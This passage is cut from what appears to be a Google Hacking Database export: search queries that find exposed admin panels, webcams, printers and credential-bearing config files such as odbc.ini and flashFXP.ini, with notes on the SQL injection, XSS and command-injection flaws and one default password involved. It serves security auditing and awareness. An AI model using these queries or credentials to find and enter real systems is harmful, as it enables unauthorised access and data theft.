The graphics and the databases are created using a tool called RRDTool.", "submited": "2004-09-29", "request": "((inurl:ifgraph \"Page generated at\") OR (\"This page was built using ifgraph\"))", "id": 520}, {"short description": "ext:cgi intext:\"nrg-\" \" This web page was created on \"", "long description": "NRG is a system for maintaining and visualizing network data and other resource utilization data. It automates the maintenance of RRDtool databases and graph web pages (that look like MRTG web pages.)", "submited": "2004-09-29", "request": "ext:cgi intext:\"nrg-\" \" This web page was created on \"", "id": 521}, {"short description": "+\":8080\" +\":3128\" +\":80\" filetype:txt", "long description": "With the string [+\":8080\" +\":3128\" +\":80\" filetype:txt] it is possible to find huge lists of proxies... So, I've written a simple shell script that checks these lists and filters out the not responding proxies. It also stores time response in another file, so you can choose only fast proxies. Furthermore it can control the zone of the proxy with a simple whois grep... The script proxytest.sh is on my website:http://rawlab.relay.homelinux.net/programmi/proxytest.sh", "submited": "2004-09-29", "request": "+\":8080\" +\":3128\" +\":80\" filetype:txt", "id": 522}, {"short description": "ReMOSitory module for Mambo", "long description": "It is reported that the ReMOSitory module for Mambo is prone to an SQL injection vulnerability. This issue is due to a failure of the module to properly validate user supplied URI input. Because of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue.Full report: http://www.securityfocus.com/bid/11219Klouw suggests: inurl:index.php?option=com_remository&Itemid= Renegade added : \".. 
to get an administrator login, change the url to http://www.example.com/administrator .. it will pop up an login box...", "submited": "2004-09-29", "request": "inurl:com_remository", "id": 523}, {"short description": "inurl:cgi.asx?StoreID", "long description": "BeyondTV is a web based software product which let you manage your TV station. All you need is to install a TV tuner card on your PC and Connect your TV source (i.e. television antenna) to your TV tuner card. With a installed BeyondTV version you can now administrate your TV with your browser even over the internet.", "submited": "2004-10-05", "request": "inurl:cgi.asx?StoreID", "id": 524}, {"short description": "inurl:hp/device/this.LCDispatcher", "long description": "This one gets you on the web interface of some more HP Printers.", "submited": "2004-10-05", "request": "inurl:hp/device/this.LCDispatcher", "id": 525}, {"short description": "intitle:\"WordPress > * > Login form\" inurl:\"wp-login.php\"", "long description": "WordPress is a semantic personal publishing platform.. it suffers from a possible XSS attacks.http://www.securityfocus.com/bid/11268/info/", "submited": "2004-10-05", "request": "intitle:\"WordPress > * > Login form\" inurl:\"wp-login.php\"", "id": 526}, {"short description": "intitle:webeye inurl:login.ml", "long description": "This one gets you on the webinterface of Webeye webcams.", "submited": "2004-10-05", "request": "intitle:webeye inurl:login.ml", "id": 527}, {"short description": "inurl:\"comment.php?serendipity\"", "long description": "serendipity is a weblog/blog system, implemented with PHP. It is standards compliant, feature rich and open source.For an attacker it is possible to inject SQL commands.http://www.securityfocus.com/bid/11269/discussion/", "submited": "2004-10-05", "request": "inurl:\"comment.php?serendipity\"", "id": 528}, {"short description": "\"Powered by AJ-Fork v.167\"", "long description": "AJ-Fork is, as the name implies - a fork. 
Based on the CuteNews 1.3.1 core, the aim of the project is to improve what can be improved, and extend what can be extended without adding too much bloat (in fierce opposition to the mainstream blogging/light publishing tools of today). The project aims to be backwards-compatible with CuteNews in what areas are sensible. It is vulnerable for a full path disclosure. http://www.securityfocus.com/bid/11301", "submited": "2004-10-05", "request": "\"Powered by AJ-Fork v.167\"", "id": 529}, {"short description": "\"Powered by Megabook *\" inurl:guestbook.cgi", "long description": "MegaBook is a web-based guestbook that is intended to run on Unix and Linux variants. MegaBook is prone to multiple HTML injection vulnerabilities. http://www.securityfocus.com/bid/8065", "submited": "2004-10-05", "request": "\"Powered by Megabook *\" inurl:guestbook.cgi", "id": 530}, {"short description": "intitle:\"axis storpoint CD\" intitle:\"ip address\"", "long description": "Axis' network CD/DVD servers are faster, less costly and easier to manage than using full-blown file servers for networking CD/DVD collections. Any organization that relies heavily on CD/DVD-based information can benefit from an AXIS StorPoint CD+.", "submited": "2004-10-05", "request": "intitle:\"axis storpoint CD\" intitle:\"ip address\"", "id": 531}, {"short description": "intext:SQLiteManager inurl:main.php", "long description": "sQLiteManager is a tool Web multi-language of management of data bases SQLite. # Management of several data base (Creation, access or upload basic) # Management of the attached bases of donnes # Creation, modification and removal of tables and index. 
# Insertion, modification, suppression of recording in these tables", "submited": "2004-10-05", "request": "intext:SQLiteManager inurl:main.php", "id": 532}, {"short description": "intitle:\"oMail-admin Administration - Login\" -inurl:omnis.ch", "long description": "oMail-webmail is a Webmail solution for mail servers based on qmail and optionally vmailmgr or vpopmail. The mail is read directly from maildirs on the hard disk, which is much quicker than using protocols like POP3 or IMAP. Other features includes multiple language support (English, French, German, Japanese, Chinese, and many more), HTML and pictures inline display, folders, and address book support.", "submited": "2004-10-05", "request": "intitle:\"oMail-admin Administration - Login\" -inurl:omnis.ch", "id": 533}, {"short description": "inurl:\"map.asp?\" intitle:\"WhatsUp Gold\"", "long description": "\"WhatsUp Gold's new SNMP Viewer tool enables Area-Wide to easily track variables associated with any port on a network device. With a few simple clicks, a network engineer can select device ports, navigate trees, and graph variables in real time. 
For instance, Area-Wide can track bandwidth or CPU utilization on a router to aid in capacity and resource management.\"", "submited": "2004-10-05", "request": "inurl:\"map.asp?\" intitle:\"WhatsUp Gold\"", "id": 534}, {"short description": "inurl:\" WWWADMIN.PL\" intitle:\"wwwadmin\"", "long description": "wwwadmin.pl is a script that allows a user with a valid username and password, to delete files and posts from the associated forum.", "submited": "2004-10-06", "request": "inurl:\" WWWADMIN.PL\" intitle:\"wwwadmin\"", "id": 535}, {"short description": "inurl:odbc.ini ext:ini -cvs", "long description": "This search will show the googler ODBC client configuration files which may contain usernames/databases/ipaddresses and whatever.", "submited": "2004-10-09", "request": "inurl:odbc.ini ext:ini -cvs", "id": 536}, {"short description": "intitle:\"Web Data Administrator - Login\"", "long description": "The Web Data Administrator is a utility program implemented in ASP.NET that enables you to easily manage your SQL Server data wherever you are. Using its built-in features, you can do the following from Internet Explorer or your favorite Web browser. Create and edit databases in Microsoft SQL Server 2000 or Microsoft SQL Server 2000 Desktop Engine (MSDE) Perform ad-hoc queries against databases and save them to your file system Export and import database schema and data.", "submited": "2004-10-09", "request": "intitle:\"Web Data Administrator - Login\"", "id": 537}, {"short description": "intitle:\"Object not found\" netware \"apache 1..\"", "long description": "This search will show netware apache webservers as the result.", "submited": "2004-10-09", "request": "intitle:\"Object not found\" netware \"apache 1..\"", "id": 538}, {"short description": "intitle:\"switch home page\" \"cisco systems\" \"Telnet - to\"", "long description": "Most cisco switches are shipped with a web administration interface. 
If a switch is reachable from the internet and Google has cached it, this search will show it.", "submited": "2004-10-09", "request": "intitle:\"switch home page\" \"cisco systems\" \"Telnet - to\"", "id": 539}, {"short description": "intitle:\"DEFAULT_CONFIG - HP\"", "long description": "searches for the web interface of HP switches.", "submited": "2004-10-09", "request": "intitle:\"DEFAULT_CONFIG - HP\"", "id": 540}, {"short description": "\"Powered by yappa-ng\"", "long description": "yappa-ng is a very powerful but easy to install and easy to use online PHP photo gallery for all Operating Systems (Linux/UNIX, Windows, MAC, ...), and all Webservers (Apache, IIS, ...) with no need for a DataBase (no MySQL,...). yappa-ng is prone to a security vulnerability in the AddOn that shows a random image from any homepage. This issue may let unauthorized users access images from locked albums. http://www.securityfocus.com/bid/11314", "submited": "2004-10-09", "request": "\"Powered by yappa-ng\"", "id": 541}, {"short description": "\"Active Webcam Page\" inurl:8080", "long description": "Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices. Known bugs: directory traversal and cross site scripting", "submited": "2004-10-09", "request": "\"Active Webcam Page\" inurl:8080", "id": 542}, {"short description": "inurl:changepassword.cgi -cvs", "long description": "Allows a user to change his/her password for authentication to the system. Script allows for repeated failed attempts making this script vulnerable to brute force.", "submited": "2004-10-09", "request": "inurl:changepassword.cgi -cvs", "id": 543}, {"short description": "filetype:ini inurl:flashFXP.ini", "long description": "FlashFXP offers the easiest and fastest way to transfer any file using FTP, providing an exceptionally stable and robust program that you can always count on to get your job done quickly and efficiently. 
There are many, many features available in FlashFXP. The flashFXP.ini file is its configuration file and may contain usernames/passwords and everything else that is needed to use FTP.", "submited": "2004-10-10", "request": "filetype:ini inurl:flashFXP.ini", "id": 544}, {"short description": "inurl:shopdbtest.asp", "long description": "shopdbtest is an ASP page used by several e-commerce products. A vulnerability in the script allows remote attackers to view the database location, and since that is usually unprotected, the attacker can then download the web site's database by simply clicking on a URL (that displays the active database). The page shopdbtest.asp is visible to all the users and contains the full configuration information. An attacker can therefore download the MDB (Microsoft Database file), and gain access to sensitive information about orders, users, password, etc.", "submited": "2004-10-10", "request": "inurl:shopdbtest.asp", "id": 545}, {"short description": "\"Powered by A-CART\"", "long description": "A-CART is an ASP shopping cart application written in VBScript. It is comprised of a number of ASP scripts and an Access database. A security vulnerability in the product allows remote attackers to download the product's database, thus gain access to sensitive information about users of the product (name, surname, address, e-mail, credit card number, and user's login-password). http://www.securityfocus.com/bid/5597 (search SF for more)", "submited": "2004-10-10", "request": "\"Powered by A-CART\"", "id": 546}, {"short description": "\"Online Store - Powered by ProductCart\"", "long description": "ProductCart is \"an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use. It is widely used by many e-commerce sites\". 
Multiple SQL injection vulnerabilities have been found in the product, they allow anything from gaining administrative privileges (bypassing the authentication mechanism), to executing arbitrary code. http://www.securityfocus.com/bid/8105 (search SF for more)", "submited": "2004-10-10", "request": "\"Online Store - Powered by ProductCart\"", "id": 547}, {"short description": "\"More Info about MetaCart Free\"", "long description": "MetaCart is an ASP based shopping Cart application with SQL database. A security vulnerability in the free demo version of the product (MetaCartFree) allows attackers to access the database used for storing user provided data (Credit card numbers, Names, Surnames, Addresses, E-mails, etc).", "submited": "2004-10-10", "request": "\"More Info about MetaCart Free\"", "id": 548}, {"short description": "inurl:midicart.mdb", "long description": "MIDICART is an ASP and PHP based shopping Cart application with MS Access and SQL database. A security vulnerability in the product allows remote attackers to download the product's database, thus gain access to sensitive information about users of the product (name, surname, address, e-mail, phone number, credit card number, and company name).", "submited": "2004-10-10", "request": "inurl:midicart.mdb", "id": 549}, {"short description": "camera linksys inurl:main.cgi", "long description": "Another webcam, Linksys style.", "submited": "2004-10-10", "request": "camera linksys inurl:main.cgi", "id": 550}, {"short description": "intitle:\"MailMan Login\"", "long description": "MailMan is a product by Endymion corporation that provides a web based interface to email via POP3 and SMTP. MailMan is very popular due to its amazingly easy setup and operation. MailMan is written as a Perl CGI script, the version that is shipped to customers is obfuscated in an attempt to prevent piracy. The code contains several insecure calls to open() containing user specified data. 
These calls can be used to execute commands on the remote server with the permissions of the user that runs CGI scripts, usually the web server user that is in most cases 'nobody'.", "submited": "2004-10-11", "request": "intitle:\"MailMan Login\"", "id": 551}, {"short description": "intitle:\"my webcamXP server!\" inurl:\":8080\"", "long description": "\"my webcamXP server!\" Is there really an explanation needed?", "submited": "2004-10-11", "request": "intitle:\"my webcamXP server!\" inurl:\":8080\"", "id": 552}, {"short description": "(inurl:webArch/mainFrame.cgi ) | (intitle:\"web image monitor\" -htm -solutions)", "long description": "The Ricoh Aficio 2035 (fax/scanner) web interface. Attackers may read faxes and can get information like internal ip addresses. cleanup by: yeseins & golfo cleanup date: Apr 28, 2005 original dork: inurl:webArch/mainFrame.cgi", "submited": "2004-10-11", "request": "(inurl:webArch/mainFrame.cgi ) | (intitle:\"web image monitor\" -htm -solutions)", "id": 553}, {"short description": "\"Powered by FUDforum\"", "long description": "FUDforum is a forums package. It uses a combination of PHP & MySQL to create a portable solution that can run on virtually any operating system. FUDforum has two security holes that allow people to download or manipulate files and directories outside of FUDforum's directories. One of the holes can be exploited by everyone, while the other requires administrator access. The program also has some SQL Injection problems. http://www.securityfocus.com/bid/5501", "submited": "2004-10-11", "request": "\"Powered by FUDforum\"", "id": 554}, {"short description": "\"BosDates Calendar System \" \"powered by BosDates v3.2 by BosDev\"", "long description": "\"BosDates is a flexible calendar system which allows for multiple calendars, email notifications, repeating events and much more. 
All of which are easily maintained by even the least technical users.\" There is a vulnerability in BosDates that allows an attacker to disclose sensitive information via SQL injection.", "submited": "2004-10-11", "request": "\"BosDates Calendar System \" \"powered by BosDates v3.2 by BosDev\"", "id": 555}, {"short description": "intitle:\"Lotus Domino Go Webserver:\" \"Tuning your webserver\" -site:ibm.com", "long description": "Domino Go Webserver is a scalable high-performance Web server that runs on a broad range of platforms. Domino Go Webserver brings you state-of-the-art security, site indexing capabilities, and advanced server statistics reporting. With Domino Go Webserver, you can speed beyond your competition by exploiting the latest advances in technology, such as Java, HTTP 1.1, and Web site content rating. Get all this and more in a Web server that's easy to install and maintain. --From the Lotus Domino Go Webserver web pag", "submited": "2004-10-12", "request": "intitle:\"Lotus Domino Go Webserver:\" \"Tuning your webserver\" -site:ibm.com", "id": 556}, {"short description": "intitle:\"Directory Listing, Index of /*/\"", "long description": "Vendor page:\"Einfache HTTP-Server-Software privates Homepage-Hosting oder Uploads.\" small HTTP server software for private hompage hosting or big uploads.", "submited": "2004-10-12", "request": "intitle:\"Directory Listing, Index of /*/\"", "id": 557}, {"short description": "intitle:\"error 404\" \"From RFC 2068 \"", "long description": "WebLogic Server Process Edition extends the functionality of the Application Server by converging custom app development with powerful Business Process Management (BPM) capabilities to provide an industrial strength, standards-based framework that enables the rapidly assembly of composite services, transforming existing infrastructure to a service oriented architecture-in a manageable phased approach.", "submited": "2004-10-12", "request": "intitle:\"error 404\" \"From RFC 2068 
\"", "id": 558}, {"short description": "intitle:\"Open WebMail\" \"Open WebMail version (2.20|2.21|2.30) \"", "long description": "\"Open WebMail is a webmail system based on the Neomail version 1.14 from Ernie Miller. Open WebMail is designed to manage very large mail folder files in a memory efficient way. It also provides a range of features to help users migrate smoothly from Microsoft Outlook to Open WebMail\". A remote attacker can run arbitrary commands with the web server's privileges by exploiting an unfiltered parameter in userstat.pl. Details Vulnerable Systems: * Open Webmail versions 2.20, 2.21 and 2.30 * Limited exploitation on openwebmail-current.tgz that was released on 2004-04-30 (See below) The vulnerability was discovered in an obsolete script named userstat. plshipped with Open Webmail. The script doesn't properly filter out shell characters from the loginname parameter. The loginname parameter is used as an argument when executing openwebmail-tool.pl from the vulnerable script. By adding a \";\", \"|\" or \"( )\" followed by the shell command to a http GET, HEAD or POST request an attacker can execute arbitrary system commands as an unprivileged user (the Apache user, \"nobody\" or \"www\", e.g.).", "submited": "2004-10-12", "request": "intitle:\"Open WebMail\" \"Open WebMail version (2.20|2.21|2.30) \"", "id": 559}, {"short description": "intitle:\"EMUMAIL - Login\" \"Powered by EMU Webmail\"", "long description": "The failure to strip script tags in emumail.cgi allows for XSS type of attack. Vulnerable systems: * EMU Webmail version 5.0 * EMU Webmail version 5.1.0 Depending on what functions you throw in there, you get certain contents of the emumail.cgi file. The vulnerability was discovered in an obsolete script named userstat.pl shipped with Open Webmail. The script doesn't properly filter out shell characters from the loginname parameter. 
http://www.securityfocus.com/bid/9861", "submited": "2004-10-12", "request": "intitle:\"EMUMAIL - Login\" \"Powered by EMU Webmail\"", "id": 560}, {"short description": "intitle:\"WebJeff - FileManager\" intext:\"login\" intext:Pass|PAsse", "long description": "WebJeff-Filemanager 1.x DESCRIPTION: A directory traversal vulnerability has been identified in WebJeff-Filemanager allowing malicious people to view the contents of arbitrary files. The problem is that the \"index.php3\" file doesn't verify the path to the requested file. Access to files can be done without authorisation. http://www.securityfocus.com/bid/7995", "submited": "2004-10-12", "request": "intitle:\"WebJeff - FileManager\" intext:\"login\" intext:Pass|PAsse", "id": 561}, {"short description": "inurl:netw_tcp.shtml", "long description": "An Axis Network Camera captures and transmits live images directly over an IP network (e.g. LAN/intranet/Internet), enabling users to remotely view and/or manage the camera from a Web browser on any computer [..]", "submited": "2004-10-12", "request": "inurl:netw_tcp.shtml", "id": 562}, {"short description": "intitle:\"Object not found!\" intext:\"Apache/2.0.* (Linux/SuSE)\"", "long description": "This one detects apache werbservers (2.0.X/SuSE) with its error page.", "submited": "2004-10-12", "request": "intitle:\"Object not found!\" intext:\"Apache/2.0.* (Linux/SuSE)\"", "id": 563}, {"short description": "inurl:\"messageboard/Forum.asp?\"", "long description": "Multiple vulnerabilities have been found in GoSmart Message Board. A remote user can conduct SQL injection attack and Cross site scripting attack. 
http://www.securityfocus.com/bid/11361", "submited": "2004-10-13", "request": "inurl:\"messageboard/Forum.asp?\"", "id": 564}, {"short description": "intitle:\"Directory Listing\" \"tree view\"", "long description": "Dirlist is an ASP script that list folders in an explorer style: * Tree * Detailed * Tiled Quote: *Lists files and directories in either a Tree, Detailed, or Tiled view. *Can set a \"Starting Directory\". This can be a IIS Virtual Directory path. *Displays file and directory properties. *Can specify directories which you do not want to display and access. *Can specify directories which you only want to display and access. *Can specify what file-types to only display. *Displays custom file-type icons. This can be turned off in the settings. * 'Detailed' and 'tiled' views display a Breadcrumb bar for easier navigation. This can be turned off in the settings.", "submited": "2004-10-14", "request": "intitle:\"Directory Listing\" \"tree view\"", "id": 565}, {"short description": "inurl:default.asp intitle:\"WebCommander\"", "long description": "Polycom WebCommander gives you control over all aspects of setting up conferences on Polycom MGC MCUs. With Polycom WebCommander, scheduling and launching multipoint conferences, ad hoc meetings or future conferences is an easy, productive way to schedule meetings.", "submited": "2004-10-14", "request": "inurl:default.asp intitle:\"WebCommander\"", "id": 566}, {"short description": "intitle:\"Philex 0.2*\" -script -site:freelists.org", "long description": "Philex (phile 'file' explorer) is a web content manager based php what philex can do ? - easy navigation with tree structure - create, delete, rename, copy and move folders/files. - download files (normal or compressed :zip, gz, bz ). - download many files as one compressed file. - send files by email. 
- upload local files to server", "submited": "2004-10-14", "request": "intitle:\"Philex 0.2*\" -script -site:freelists.org", "id": 567}, {"short description": "intitle:mywebftp \"Please enter your password\"", "long description": "MyWebFTP Free is a free lite version of MyWebFTP Personal - a PHP script providing FTP client capabilities with the user interface in your browser. Install it on a remote server and easily connect to your FTP servers through a firewall or a proxy not allowing FTP connections. No PHP built-in FTP support is required. Perform actions on many files at once. Password protected from casual surfers wasting your bandwidth. Nice look and feel is easy customizable.", "submited": "2004-10-14", "request": "intitle:mywebftp \"Please enter your password\"", "id": 568}, {"short description": "\"1999-2004 FuseTalk Inc\" -site:fusetalk.com", "long description": "Fusetalk forums (v4) are susceptible to cross site scripting attacks that can be exploited by passing a img src with malicious javascript.", "submited": "2004-10-15", "request": "\"1999-2004 FuseTalk Inc\" -site:fusetalk.com", "id": 569}, {"short description": "\"2003 DUware All Rights Reserved\"", "long description": "Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account. DUclassmate may allow unauthorized remote attackers to gain access to a computer. DUclassified is reported prone to multiple SQL injection vulnerabilities. SQL injection issues also affect DUforum. 
DUclassified and DUforum are also reported vulnerable to various unspecified HTML injection vulnerabilities.", "submited": "2004-10-16", "request": "\"2003 DUware All Rights Reserved\"", "id": 570}, {"short description": "\"WebExplorer Server - Login\" \"Welcome to WebExplorer Server\"", "long description": "WebExplorer Server is a web-based file management system for sharing files with user permissions and quota limits. It features easy user interface and online administration which will allow you to manage users/groups/permissions without the need of server configuration knowledge. It can be used for remote file storage(eg FreeDrive)/hosting services, Companies/Educational institutions that need to share documents among people.", "submited": "2004-10-16", "request": "\"WebExplorer Server - Login\" \"Welcome to WebExplorer Server\"", "id": 571}, {"short description": "intitle:\"ASP Stats Generator *.*\" \"ASP Stats Generator\" \"2003-2004 weppos\"", "long description": "ASP Stats Generator is a powerful ASP script to track web site activity. It combines a server side sniffer with a javascript system to get information about clients who are visiting your site.", "submited": "2004-10-16", "request": "intitle:\"ASP Stats Generator *.*\" \"ASP Stats Generator\" \"2003-2004 weppos\"", "id": 572}, {"short description": "\"Installed Objects Scanner\" inurl:default.asp", "long description": "Installed Objects Scanner makes it easy to test your IIS Webserver for installed components. Installed Objects Scanner also has descriptions and links for many components to let you know more on how using those components. 
Just place the script on your server and view it in your browser to check your server for all currently known components.", "submited": "2004-10-16", "request": "\"Installed Objects Scanner\" inurl:default.asp", "id": 573}, {"short description": "intitle:\"remote assessment\" OpenAanval Console", "long description": "The Aanval Intrusion Detection Console is an advanced intrusion detection monitor and alerting system. Currently supporting modules for Snort and syslog - Aanval provides real-time monitoring, reporting, alerting and stability. Aanval's web-browser interface provides real-time event viewing and system/sensor management.", "submited": "2004-10-16", "request": "intitle:\"remote assessment\" OpenAanval Console", "id": 574}, {"short description": "ext:ini intext:env.ini", "long description": "This one shows configuration files for various applications. based on the application an attacker may find information like passwords, ipaddresses and more.", "submited": "2004-10-16", "request": "ext:ini intext:env.ini", "id": 575}, {"short description": "ezBOO \"Administrator Panel\" -cvs", "long description": "ezBOO WebStats is a high level statistical tool for web sites monitoring. It allows real time access monitoring on several sites. Based on php and mySQL it is easy to install and customization is made easy. It works on Unix, Linux and Windows", "submited": "2004-10-16", "request": "ezBOO \"Administrator Panel\" -cvs", "id": 576}, {"short description": "\"This page has been automatically generated by Plesk Server Administrator\"", "long description": "Plesk Server Administrator (PSA) is web based software that enables remote administration of web servers. It can be used on Linux and other systems that support PHP. Due to an input validation error in Plesk Server Administrator, it is possible for a remote attacker to make a specially crafted web request which will display PHP source code. 
This is achievable by connecting to a host (using the IP address rather than the domain name), and submitting a request for a known PHP file along with a valid username. http://www.securityfocus.com/bid/3737", "submited": "2004-10-16", "request": "\"This page has been automatically generated by Plesk Server Administrator\"", "id": 577}, {"short description": "\"The script whose uid is \" \"is not allowed to access\"", "long description": "This PHP error message is revealing the webserver's directory and user ID.", "submited": "2004-10-16", "request": "\"The script whose uid is \" \"is not allowed to access\"", "id": 578}, {"short description": "filetype:php inurl:nqt intext:\"Network Query Tool\"", "long description": "Network Query Tool enables any Internet user to scan network information using: * Resolve/Reverse Lookup * Get DNS Records * Whois (Web) * Whois (IP owner) * Check port (!!!) * Ping host * Traceroute to host * Do it all. The author has been informed that the nqt form also accepts input from cross site pages, but he will not fix it. A smart programmer could use the port scan feature and probe all the nmap services ports. Though this would be slow, it provides a higher degree of anonymity, especially if the attacker is using a proxy or an Internet Cafe host to access the NQT pages. It gets even worse .. an attacker can scan the *internal* hosts of the networks that host NQT in many cases. Very dangerous. PS: this vulnerability was found early this year (search google for the full report), but was never added to the GHDB for some reason.", "submited": "2004-10-18", "request": "filetype:php inurl:nqt intext:\"Network Query Tool\"", "id": 579}, {"short description": "inurl:TiVoConnect?Command=QueryServer", "long description": "Tivo is the digital replacement for your analog videorecorder. It's a digital media system that amongst other things allows recording tv shows to a hard disk. 
More information is available at http://www.tivo.com.This search was found in one of those cgi scanning tools out there. Currently there are only two results and only the first responds with information like this:1.0Sat Oct 16 15:26:46 EDT 2004JavaHMO1.0Leon Nicholls-This is an official build. Identifier: 2003.03.25-1612 Last Change: 112792In the future vulnerabilities may be found in this software. For now an attacker can enjoy the mp3 stream it provides (copy the server:port in winamp or xmms).", "submited": "2004-10-18", "request": "inurl:TiVoConnect?Command=QueryServer", "id": 580}, {"short description": "ext:mdb inurl:*.mdb inurl:fpdb shop.mdb", "long description": "The directory \"http:/xxx/fpdb/\" is the database folder used by some versions of FrontPage. It contains many types of Microsoft Access databases.One of them is Metacart, who used \"shop.mdb\" as their default name. It contains customer info like phone numbers but also plain text passwords. A screenshot is available at ImageShack: http://img49.exs.cx/img49/7673/shopmdb.jpgThree results only at time of writing. Remove the shop.mdb part to see the complete list of databases.", "submited": "2004-10-18", "request": "ext:mdb inurl:*.mdb inurl:fpdb shop.mdb", "id": 581}, {"short description": "inurl:cgi-bin/testcgi.exe \"Please distribute TestCGI\"", "long description": "Test CGI by Lilikoi Software aids in the installation of the Ceilidh discussion engine for the World Wide Web. An attacker can use this to gather information about the server like: Operating System, IP and the full docroot path.", "submited": "2004-10-18", "request": "inurl:cgi-bin/testcgi.exe \"Please distribute TestCGI\"", "id": 582}, {"short description": "inurl:ttt-webmaster.php", "long description": "Turbo traffic trader Nitro v1.0 is a free, fully automated traffic trading script. 
Multiple vulnerabilities were found. Vulnerability report: http://www.securityfocus.com/bid/11358 Vendor site: http://www.turbotraffictrader.com/php", "submited": "2004-10-19", "request": "inurl:ttt-webmaster.php", "id": 583}, {"short description": "intitle:\"DVR Web client\"", "long description": "This embedded DVR is quick plug and play. Just plug it in and it will start recording. You can view all the cameras at once or one at a time. Allows individual pictures to come up on play back or all together. The best feature is the ability to connect via a network and play back existing stored video or view images live. * Four Channel Input * Horizontal Resolution 480 Lines * 16.7 Million Color Output * Display In Quad or Single Image (Full MultiPlex) * Motion Detection * Scheduling * Zoom in Live and Playback * 720H X 480V (Full) 360H X 240V In Quad * 0.1 FPS Thru 15 FPS each camera (60 FPS Total) * Web Interface TCP/IP With Client Software * Back-Up With Mark Image, VCR, Time Lapse, Remote Client Software * Full Remote Camera Controls (PTZ), Alarms, Wiper, Fans, Etc.", "submited": "2004-10-19", "request": "intitle:\"DVR Web client\"", "id": 584}, {"short description": "intitle:\"ASP FileMan\" Resend -site:iisworks.com", "long description": "FileMan is a corporate web based storage and file management solution for intra- and internet. It runs on Microsoft IIS webservers and is written in ASP. All user and group settings are stored in a MS Access or SQL database. Default user: user=admin, pass=pass. In the default installation a diagnostics page called diags.asp exists; the manual recommends deleting it, but it can be found in some installs. The path to the database is also on the page. If the server is not configured correctly, the mdb file can be downloaded and the passwords are not encrypted. Site admins have been notified. 
As always: DO NOT ABUSE THIS.", "submited": "2004-10-19", "request": "intitle:\"ASP FileMan\" Resend -site:iisworks.com", "id": 585}, {"short description": "intitle:\"index.of *\" admin news.asp configview.asp", "long description": "With Compulive News you can enter the details of your news items onto a webform and upload images through your browser. It integrates seamlessly within your website.When you open your CNU5 zip there is a news folder created with three subfolders: htmlarea, images and admin. In the news folder is your database file. For security purposes the manual recommends that you immediately rename this database to a name of your own choosing thereby making it harder for anyone to download your news database.The database contains the plain text password. PS: this search is based on the index of method. There are other ways to find this software, but finding the news database becomes a lot more difficult for an attacker that way.", "submited": "2004-10-19", "request": "intitle:\"index.of *\" admin news.asp configview.asp", "id": 586}, {"short description": "\"Copyright 2002 Agustin Dondo Scripts\"", "long description": "CoolPHP has multiple vulnerabilities:* Cross-Site Scripting vulnerability (index.php)* A Path Disclosure Vulnerability (index.php)* Local file include Vulnerability with Directory Traversal info: http://www.securityfocus.com/archive/1/378617", "submited": "2004-10-19", "request": "\"Copyright 2002 Agustin Dondo Scripts\"", "id": 587}, {"short description": "\"IMail Server Web Messaging\" intitle:login", "long description": "IMail Server from Ipswitch is a messaging solution with 60 million users worldwide. It contains the features and safeguards you need without the complexity of expensive solutions like Microsoft Exchange or groupware which challenges even the most experienced administrators.This is a login portal search. 
Security Focus shows a list of vulnerabilities about this software.", "submited": "2004-10-19", "request": "\"IMail Server Web Messaging\" intitle:login", "id": 588}, {"short description": "intitle:\"Directory Listing For\" intext:Tomcat -intitle:Tomcat", "long description": "The Google Hackers Guide explains how to find Apache directory indexes, which are the most common found on the Internet. There are other ways however.This query is a generic search for servers using Tomcat with directory listings enabled. They are a bit more fancy than Apache's default lists and more importantly they will not be found using \"index.of\".", "submited": "2004-10-19", "request": "intitle:\"Directory Listing For\" intext:Tomcat -int", "id": 589}, {"short description": "site:.viewnetcam.com -www.viewnetcam.com", "long description": "The FREE viewnetcam.com service allows you to create a personal web address (e.g., http://bob.viewnetcam.com) at which your camera's live image can be found on the Internet. How the camera and service works: Special Software embedded within your Panasonic Network Camera gives your camera the ability to locate your unique Internet address. No matter what kind of Internet connection you have or which Internet provider you use, the viewnetcam.com service will keep your camera's Internet address permanent.", "submited": "2004-10-19", "request": "site:.viewnetcam.com -www.viewnetcam.com", "id": 590}, {"short description": "inurl:/cgi-bin/finger? Enter (account|host|user|username)", "long description": "The finger command on unix displays information about the system users. This search displays the webinterface for that command.", "submited": "2004-10-19", "request": "inurl:/cgi-bin/finger? Enter (account|host|user|username)", "id": 591}, {"short description": "inurl:/cgi-bin/finger? \"In real life\"", "long description": "The finger command on unix displays information about the system users. 
This search displays pre-fingered users, so an attacker wouldn't even have to guess their accounts.", "submited": "2004-10-19", "request": "inurl:/cgi-bin/finger? \"In real life\"", "id": 592}, {"short description": "inurl:\"calendar.asp?action=login\"", "long description": "aspWebCalendar is a browser based software package that runs over a standard web browser, such as Internet Explorer from Microsoft, and allows an organization of any size to easily and cost effectively provide personal and group calendar functions to everyone in the organization.A vulnerability has been found for the (SQL version) script family from Full Revolution. Affected software is: aspWebAlbum, aspWebCalendar, aspWebHeadlines, aspWebMail. You can check it here: http://www.securityfocus.com/bid/11246Searches for aspWebAlbum and aspWebHeadlines:inurl:\"album.asp?action=login\"inurl:\"news.asp?action=login\"", "submited": "2004-10-06", "request": "inurl:\"calendar.asp?action=login\"", "id": 593}, {"short description": "\"Powered by CubeCart\"", "long description": "--------------------------------------------------------Full path disclosure and sql injection on CubeCart 2.0.1--------------------------------------------------------[1]Introduction[2]The Problem[3]The Solution[4]Timeline[5]Feddback##############################################################[1]Introduction\"CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you can setup a powerful online store as long as youhave hosting supporting PHP and one MySQL database.\"This info was taken from hxxp://www.cubecart.comCubeCart, from Brooky (hxxp://www.brooky.com), is a software formerly known as eStore.[2]The ProblemA remote user can cause an error in index.php using the parameter 'cat_id' which is not properly validated, displaying thesoftware's full installation path. It can also be used to inject sql commands. 
